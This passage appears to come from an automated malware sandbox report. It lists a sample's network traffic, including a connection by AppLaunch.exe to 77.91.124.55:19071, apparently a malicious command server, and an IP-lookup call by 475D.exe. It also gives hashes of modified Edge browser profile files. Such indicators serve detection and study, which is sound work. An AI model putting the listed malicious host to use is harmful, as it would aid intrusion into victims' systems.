                                                                                                                4
                                                                                                              • 77.91.124.55:19071
                                                                                                                AppLaunch.exe
                                                                                                                208 B
                                                                                                                4
                                                                                                              • 8.8.8.8:53
                                                                                                                72.32.126.40.in-addr.arpa
                                                                                                                dns
                                                                                                                71 B
                                                                                                                157 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                72.32.126.40.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                8.8.8.8.in-addr.arpa
                                                                                                                dns
                                                                                                                66 B
                                                                                                                90 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                8.8.8.8.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                126.22.238.8.in-addr.arpa
                                                                                                                dns
                                                                                                                71 B
                                                                                                                125 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                126.22.238.8.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                95.221.229.192.in-addr.arpa
                                                                                                                dns
                                                                                                                73 B
                                                                                                                144 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                95.221.229.192.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                241.154.82.20.in-addr.arpa
                                                                                                                dns
                                                                                                                72 B
                                                                                                                158 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                241.154.82.20.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                59.128.231.4.in-addr.arpa
                                                                                                                dns
                                                                                                                71 B
                                                                                                                157 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                59.128.231.4.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                29.81.57.23.in-addr.arpa
                                                                                                                dns
                                                                                                                70 B
                                                                                                                133 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                29.81.57.23.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                26.35.223.20.in-addr.arpa
                                                                                                                dns
                                                                                                                71 B
                                                                                                                157 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                26.35.223.20.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                23.159.190.20.in-addr.arpa
                                                                                                                dns
                                                                                                                72 B
                                                                                                                158 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                23.159.190.20.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                29.68.91.77.in-addr.arpa
                                                                                                                dns
                                                                                                                70 B
                                                                                                                107 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                29.68.91.77.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                52.68.91.77.in-addr.arpa
                                                                                                                dns
                                                                                                                70 B
                                                                                                                107 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                52.68.91.77.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                50.23.12.20.in-addr.arpa
                                                                                                                dns
                                                                                                                70 B
                                                                                                                156 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                50.23.12.20.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                211.92.42.5.in-addr.arpa
                                                                                                                dns
                                                                                                                70 B
                                                                                                                107 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                211.92.42.5.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                80.65.42.5.in-addr.arpa
                                                                                                                dns
                                                                                                                69 B
                                                                                                                129 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                80.65.42.5.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                206.23.85.13.in-addr.arpa
                                                                                                                dns
                                                                                                                71 B
                                                                                                                145 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                206.23.85.13.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                222.70.216.185.in-addr.arpa
                                                                                                                dns
                                                                                                                73 B
                                                                                                                133 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                222.70.216.185.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                254.3.248.8.in-addr.arpa
                                                                                                                dns
                                                                                                                70 B
                                                                                                                124 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                254.3.248.8.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                213.28.22.171.in-addr.arpa
                                                                                                                dns
                                                                                                                72 B
                                                                                                                133 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                213.28.22.171.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                accounts.google.com
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                65 B
                                                                                                                81 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                accounts.google.com

                                                                                                                DNS Response

                                                                                                                142.250.179.141

                                                                                                              • 8.8.8.8:53
                                                                                                                www.facebook.com
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                62 B
                                                                                                                107 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                www.facebook.com

                                                                                                                DNS Response

                                                                                                                157.240.201.35

                                                                                                              • 142.250.179.141:443
                                                                                                                accounts.google.com
                                                                                                                https
                                                                                                                msedge.exe
                                                                                                                7.0kB
                                                                                                                122.8kB
                                                                                                                57
                                                                                                                100
                                                                                                              • 8.8.8.8:53
                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                dns
                                                                                                                72 B
                                                                                                                158 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                208.194.73.20.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                141.179.250.142.in-addr.arpa
                                                                                                                dns
                                                                                                                74 B
                                                                                                                113 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                141.179.250.142.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                35.201.240.157.in-addr.arpa
                                                                                                                dns
                                                                                                                73 B
                                                                                                                126 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                35.201.240.157.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                static.xx.fbcdn.net
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                65 B
                                                                                                                104 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                static.xx.fbcdn.net

                                                                                                                DNS Response

                                                                                                                157.240.221.16

                                                                                                              • 8.8.8.8:53
                                                                                                                16.221.240.157.in-addr.arpa
                                                                                                                dns
                                                                                                                73 B
                                                                                                                117 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                16.221.240.157.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                facebook.com
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                58 B
                                                                                                                74 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                facebook.com

                                                                                                                DNS Response

                                                                                                                157.240.221.35

                                                                                                              • 8.8.8.8:53
                                                                                                                fbcdn.net
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                55 B
                                                                                                                71 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                fbcdn.net

                                                                                                                DNS Response

                                                                                                                157.240.221.35

                                                                                                              • 8.8.8.8:53
                                                                                                                35.221.240.157.in-addr.arpa
                                                                                                                dns
                                                                                                                73 B
                                                                                                                126 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                35.221.240.157.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                fbsbx.com
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                55 B
                                                                                                                71 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                fbsbx.com

                                                                                                                DNS Response

                                                                                                                157.240.221.35

                                                                                                              • 8.8.8.8:53
                                                                                                                2.136.104.51.in-addr.arpa
                                                                                                                dns
                                                                                                                71 B
                                                                                                                157 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                2.136.104.51.in-addr.arpa

                                                                                                              • 224.0.0.251:5353
                                                                                                                msedge.exe
                                                                                                                520 B
                                                                                                                8
                                                                                                              • 8.8.8.8:53
                                                                                                                195.179.250.142.in-addr.arpa
                                                                                                                dns
                                                                                                                74 B
                                                                                                                112 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                195.179.250.142.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                1.124.91.77.in-addr.arpa
                                                                                                                dns
                                                                                                                70 B
                                                                                                                83 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                1.124.91.77.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                131.179.250.142.in-addr.arpa
                                                                                                                dns
                                                                                                                74 B
                                                                                                                112 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                131.179.250.142.in-addr.arpa

                                                                                                              • 142.250.179.141:443
                                                                                                                accounts.google.com
                                                                                                                https
                                                                                                                msedge.exe
                                                                                                                4.9kB
                                                                                                                5.3kB
                                                                                                                15
                                                                                                                20
                                                                                                              • 8.8.8.8:53
                                                                                                                learn.microsoft.com
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                130 B
                                                                                                                540 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                learn.microsoft.com

                                                                                                                DNS Response

                                                                                                                104.85.2.139

                                                                                                                DNS Request

                                                                                                                learn.microsoft.com

                                                                                                                DNS Response

                                                                                                                104.85.2.139

                                                                                                              • 8.8.8.8:53
                                                                                                                59.82.57.23.in-addr.arpa
                                                                                                                dns
                                                                                                                70 B
                                                                                                                133 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                59.82.57.23.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                139.2.85.104.in-addr.arpa
                                                                                                                dns
                                                                                                                142 B
                                                                                                                270 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                139.2.85.104.in-addr.arpa

                                                                                                                DNS Request

                                                                                                                139.2.85.104.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                202.28.22.171.in-addr.arpa
                                                                                                                dns
                                                                                                                144 B
                                                                                                                266 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                202.28.22.171.in-addr.arpa

                                                                                                                DNS Request

                                                                                                                202.28.22.171.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                65.9.196.185.in-addr.arpa
                                                                                                                dns
                                                                                                                142 B
                                                                                                                280 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                65.9.196.185.in-addr.arpa

                                                                                                                DNS Request

                                                                                                                65.9.196.185.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                wcpstatic.microsoft.com
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                138 B
                                                                                                                512 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                wcpstatic.microsoft.com

                                                                                                                DNS Request

                                                                                                                wcpstatic.microsoft.com

                                                                                                                DNS Response

                                                                                                                13.107.246.67
                                                                                                                13.107.213.67

                                                                                                                DNS Response

                                                                                                                13.107.246.67
                                                                                                                13.107.213.67

                                                                                                              • 8.8.8.8:53
                                                                                                                js.monitor.azure.com
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                132 B
                                                                                                                546 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                js.monitor.azure.com

                                                                                                                DNS Request

                                                                                                                js.monitor.azure.com

                                                                                                                DNS Response

                                                                                                                13.107.246.67
                                                                                                                13.107.213.67

                                                                                                                DNS Response

                                                                                                                13.107.246.67
                                                                                                                13.107.213.67

                                                                                                              • 8.8.8.8:53
                                                                                                                mscom.demdex.net
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                124 B
                                                                                                                600 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                mscom.demdex.net

                                                                                                                DNS Response

                                                                                                                52.210.204.82
                                                                                                                63.34.77.44
                                                                                                                34.253.158.202
                                                                                                                52.31.123.248
                                                                                                                34.255.45.168
                                                                                                                99.81.14.86
                                                                                                                34.255.92.83
                                                                                                                34.247.108.36

                                                                                                                DNS Request

                                                                                                                mscom.demdex.net

                                                                                                                DNS Response

                                                                                                                52.210.204.82
                                                                                                                63.34.77.44
                                                                                                                34.253.158.202
                                                                                                                52.31.123.248
                                                                                                                34.255.45.168
                                                                                                                99.81.14.86
                                                                                                                34.255.92.83
                                                                                                                34.247.108.36

                                                                                                              • 8.8.8.8:53
                                                                                                                microsoftmscompoc.tt.omtrdc.net
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                77 B
                                                                                                                212 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                microsoftmscompoc.tt.omtrdc.net

                                                                                                                DNS Response

                                                                                                                66.235.152.113
                                                                                                                66.235.152.152
                                                                                                                66.235.152.115
                                                                                                                66.235.152.126
                                                                                                                66.235.152.107
                                                                                                                66.235.152.143

                                                                                                              • 8.8.8.8:53
                                                                                                                target.microsoft.com
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                66 B
                                                                                                                246 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                target.microsoft.com

                                                                                                                DNS Response

                                                                                                                66.235.152.152
                                                                                                                66.235.152.115
                                                                                                                66.235.152.126
                                                                                                                66.235.152.107
                                                                                                                66.235.152.143
                                                                                                                66.235.152.113

                                                                                                              • 8.8.8.8:53
                                                                                                                67.246.107.13.in-addr.arpa
                                                                                                                dns
                                                                                                                144 B
                                                                                                                316 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                67.246.107.13.in-addr.arpa

                                                                                                                DNS Request

                                                                                                                67.246.107.13.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                171.176.209.85.in-addr.arpa
                                                                                                                dns
                                                                                                                146 B
                                                                                                                318 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                171.176.209.85.in-addr.arpa

                                                                                                                DNS Request

                                                                                                                171.176.209.85.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                238.70.216.185.in-addr.arpa
                                                                                                                dns
                                                                                                                73 B
                                                                                                                133 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                238.70.216.185.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                82.204.210.52.in-addr.arpa
                                                                                                                dns
                                                                                                                72 B
                                                                                                                135 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                82.204.210.52.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                api.ip.sb
                                                                                                                dns
                                                                                                                475D.exe
                                                                                                                55 B
                                                                                                                145 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                api.ip.sb

                                                                                                                DNS Response

                                                                                                                104.26.12.31
                                                                                                                104.26.13.31
                                                                                                                172.67.75.172

                                                                                                              • 8.8.8.8:53
                                                                                                                31.12.26.104.in-addr.arpa
                                                                                                                dns
                                                                                                                142 B
                                                                                                                266 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                31.12.26.104.in-addr.arpa

                                                                                                                DNS Request

                                                                                                                31.12.26.104.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                browser.events.data.microsoft.com
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                79 B
                                                                                                                203 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                browser.events.data.microsoft.com

                                                                                                                DNS Response

                                                                                                                104.208.16.89

                                                                                                              • 8.8.8.8:53
                                                                                                                89.16.208.104.in-addr.arpa
                                                                                                                dns
                                                                                                                72 B
                                                                                                                146 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                89.16.208.104.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                play.google.com
                                                                                                                dns
                                                                                                                msedge.exe
                                                                                                                61 B
                                                                                                                77 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                play.google.com

                                                                                                                DNS Response

                                                                                                                142.251.36.14

                                                                                                              • 142.251.36.14:443
                                                                                                                play.google.com
                                                                                                                https
                                                                                                                msedge.exe
                                                                                                                5.0kB
                                                                                                                9.2kB
                                                                                                                12
                                                                                                                13
                                                                                                              • 8.8.8.8:53
                                                                                                                14.36.251.142.in-addr.arpa
                                                                                                                dns
                                                                                                                72 B
                                                                                                                111 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                14.36.251.142.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                137.71.105.51.in-addr.arpa
                                                                                                                dns
                                                                                                                72 B
                                                                                                                158 B
                                                                                                                1
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                137.71.105.51.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                197.98.23.89.in-addr.arpa
                                                                                                                dns
                                                                                                                142 B
                                                                                                                262 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                197.98.23.89.in-addr.arpa

                                                                                                                DNS Request

                                                                                                                197.98.23.89.in-addr.arpa

                                                                                                              • 8.8.8.8:53
                                                                                                                tse1.mm.bing.net
                                                                                                                dns
                                                                                                                124 B
                                                                                                                346 B
                                                                                                                2
                                                                                                                2

                                                                                                                DNS Request

                                                                                                                tse1.mm.bing.net

                                                                                                                DNS Request

                                                                                                                tse1.mm.bing.net

                                                                                                                DNS Response

                                                                                                                204.79.197.200
                                                                                                                13.107.21.200

                                                                                                                DNS Response

                                                                                                                204.79.197.200
                                                                                                                13.107.21.200

                                                                                                              • 142.250.179.141:443
                                                                                                                accounts.google.com
                                                                                                                https
                                                                                                                msedge.exe
                                                                                                                3.0kB
                                                                                                                4.8kB
                                                                                                                12
                                                                                                                13
                                                                                                              • 8.8.8.8:53
                                                                                                                196.168.217.172.in-addr.arpa
                                                                                                                dns
                                                                                                                148 B
                                                                                                                112 B
                                                                                                                2
                                                                                                                1

                                                                                                                DNS Request

                                                                                                                196.168.217.172.in-addr.arpa

                                                                                                                DNS Request

                                                                                                                196.168.217.172.in-addr.arpa

                                                                                                              • 142.251.36.14:443
                                                                                                                play.google.com
                                                                                                                https
                                                                                                                msedge.exe
                                                                                                                4.0kB
                                                                                                                3.5kB
                                                                                                                11
                                                                                                                12

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                bf009481892dd0d1c49db97428428ede

                                                                                                                SHA1

                                                                                                                aee4e7e213f6332c1629a701b42335eb1a035c66

                                                                                                                SHA256

                                                                                                                18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4

                                                                                                                SHA512

                                                                                                                d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                bf009481892dd0d1c49db97428428ede

                                                                                                                SHA1

                                                                                                                aee4e7e213f6332c1629a701b42335eb1a035c66

                                                                                                                SHA256

                                                                                                                18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4

                                                                                                                SHA512

                                                                                                                d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                bf009481892dd0d1c49db97428428ede

                                                                                                                SHA1

                                                                                                                aee4e7e213f6332c1629a701b42335eb1a035c66

                                                                                                                SHA256

                                                                                                                18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4

                                                                                                                SHA512

                                                                                                                d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                bf009481892dd0d1c49db97428428ede

                                                                                                                SHA1

                                                                                                                aee4e7e213f6332c1629a701b42335eb1a035c66

                                                                                                                SHA256

                                                                                                                18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4

                                                                                                                SHA512

                                                                                                                d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                bf009481892dd0d1c49db97428428ede

                                                                                                                SHA1

                                                                                                                aee4e7e213f6332c1629a701b42335eb1a035c66

                                                                                                                SHA256

                                                                                                                18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4

                                                                                                                SHA512

                                                                                                                d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                bf009481892dd0d1c49db97428428ede

                                                                                                                SHA1

                                                                                                                aee4e7e213f6332c1629a701b42335eb1a035c66

                                                                                                                SHA256

                                                                                                                18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4

                                                                                                                SHA512

                                                                                                                d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                bf009481892dd0d1c49db97428428ede

                                                                                                                SHA1

                                                                                                                aee4e7e213f6332c1629a701b42335eb1a035c66

                                                                                                                SHA256

                                                                                                                18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4

                                                                                                                SHA512

                                                                                                                d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                bf009481892dd0d1c49db97428428ede

                                                                                                                SHA1

                                                                                                                aee4e7e213f6332c1629a701b42335eb1a035c66

                                                                                                                SHA256

                                                                                                                18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4

                                                                                                                SHA512

                                                                                                                d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                Filesize

                                                                                                                1KB

                                                                                                                MD5

                                                                                                                c300ad7d8332926eaf69e795740cfd1d

                                                                                                                SHA1

                                                                                                                76c308201508505b524ef9c0ff01084becc23d05

                                                                                                                SHA256

                                                                                                                9cfdf83f7ecab247fc624650bd82466cc14d7d77235e784013a4407760d42dc2

                                                                                                                SHA512

                                                                                                                f5e2b254e3be1b5b4e06bbca307679ca8dc8644a4ad80328999df6aa475a12ae5515ca46431edb9fd66ea8aa19b5ae8ae5f79097a7a7d2d6d69e2072a318e85f

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                Filesize

                                                                                                                111B

                                                                                                                MD5

                                                                                                                285252a2f6327d41eab203dc2f402c67

                                                                                                                SHA1

                                                                                                                acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                SHA256

                                                                                                                5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                SHA512

                                                                                                                11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                5KB

                                                                                                                MD5

                                                                                                                696446800883afb9db8d25d004559b46

                                                                                                                SHA1

                                                                                                                d8db15edda553aae932e8025f6383cb038416f0e

                                                                                                                SHA256

                                                                                                                4089c38446fb4cc6a8311977247d5c2c7d720176ee58308520206a0e3d66e2f0

                                                                                                                SHA512

                                                                                                                b5bcafe3008d70aeaac8c3a8a85f3d9edf1d33ed95b07ac608b300b2534b7dbc9d2cd326835751b31f7f7310c22f3260b352f8dc3a294ffeb26f91e38f7e6e53

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                                MD5

                                                                                                                f1d10d2ad248aff6fd4f538d284043f1

                                                                                                                SHA1

                                                                                                                5fbc19b28494babc9abac577ed2efdc4353d41d6

                                                                                                                SHA256

                                                                                                                c6ecf3b9dac06382bbad9d88d1e98f4484375a4f3e8b5d6ef9ba40dba42d50e1

                                                                                                                SHA512

                                                                                                                74ef309b3e0ce5d9366f8ca5311c4cbea94e5c9ce803b4fcd488f35a5bc0d87baf91dd1098b75659965ac1f759bfa925020e8c8212f88d3d510e6c3b53ab954f

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                                MD5

                                                                                                                3db3bedee1e39663787ada75b9f8e5a2

                                                                                                                SHA1

                                                                                                                2a7be688912f2df35e32f04e1d90139734107f90

                                                                                                                SHA256

                                                                                                                d77428b5fac0f53972e54fd01c78008be7b91dfc4efd19d58f90ff6dabd702bf

                                                                                                                SHA512

                                                                                                                d97eb81386a97b677ea70279764af581c22fec1c4509eabc0ff47a82c864323f514ef2b9c3e4f426a3b7320edb697e9a5e44737112972afa438c942076837bad

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                Filesize

                                                                                                                24KB

                                                                                                                MD5

                                                                                                                25ac77f8c7c7b76b93c8346e41b89a95

                                                                                                                SHA1

                                                                                                                5a8f769162bab0a75b1014fb8b94f9bb1fb7970a

                                                                                                                SHA256

                                                                                                                8ad26364375358eac8238a730ef826749677c62d709003d84e758f0e7478cc4b

                                                                                                                SHA512

                                                                                                                df64a3593882972f3b10c997b118087c97a7fa684cd722624d7f5fb41d645c605d59a89eccf7518570ff9e73b4310432c4bb5864ee58e78c0743c0c1606853a7

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                872B

                                                                                                                MD5

                                                                                                                582a71970704eba2eecf3480dd295a43

                                                                                                                SHA1

                                                                                                                856ecd8b0125f6a6416aed4a85acab1eadb55c69

                                                                                                                SHA256

                                                                                                                35f38c7373dfe6d3880805df2858d018d0bdca83906d1fabdfa7d495ed796d4c

                                                                                                                SHA512

                                                                                                                1a94492d4b4db27e2804a564b017cce4e8b75c6ec4e6acca5f7573683b4de2562937589b8efe31bff06394a37970b992e6e6f58aa5e4f295854b8b9153f76b10

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                1KB

                                                                                                                MD5

                                                                                                                0bee60eab9e6f8542d042db053ded731

                                                                                                                SHA1

                                                                                                                2e67f941710430019ed8d7ee42012ce9be464664

                                                                                                                SHA256

                                                                                                                d77ffe734c4151846934e0ae99b952db596886582a654d06c01f6c644f654ade

                                                                                                                SHA512

                                                                                                                6e1cb9ee9614b1d3a916ce2b775225bb4467ca3c6c46d8e898c7ce6bcb7c18cd244478cc79c758bc9f2e7f102d988112bcda1d5fec97defea821ed864012636a

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                1KB

                                                                                                                MD5

                                                                                                                8168572b04ad809fcd39437e3e6b5507

                                                                                                                SHA1

                                                                                                                494d1e554ddbb00dcb75355d4bfccb654023aa71

                                                                                                                SHA256

